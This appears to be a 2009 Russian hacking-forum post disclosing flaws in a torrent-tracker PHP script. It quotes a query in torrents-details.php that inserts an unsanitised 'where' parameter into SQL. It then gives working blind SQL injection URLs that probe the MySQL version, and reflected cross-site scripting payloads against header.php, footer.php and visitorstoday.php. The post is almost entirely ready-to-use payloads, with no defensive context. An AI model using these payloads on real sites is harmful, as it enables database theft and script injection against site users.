14.11.2009, 03:06
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909
Репутация:
308
|
|
Открываем файл torrents-details.php :
Код:
//speed mod
$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents
WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")
or sqlerr(__FILE__, __LINE__);
Код:
http://localhost/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+
Нормально выводит страницу
Код:
http://localhost/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+
"MYSQL Error has occurred!"
Пассивки везде:
Код:
http://localhost/themes/default/footer.php?ttversion=<script>alert(123);</script>
http://localhost/themes/default/header.php?SITENAME="><script>alert(123);</script>
http://localhost/themes/default/header.php?CURUSER[username]=<script>alert(123);</script>
http://localhost/visitorstoday.php?todayactive=<script>alert(123);</script>
|
|
|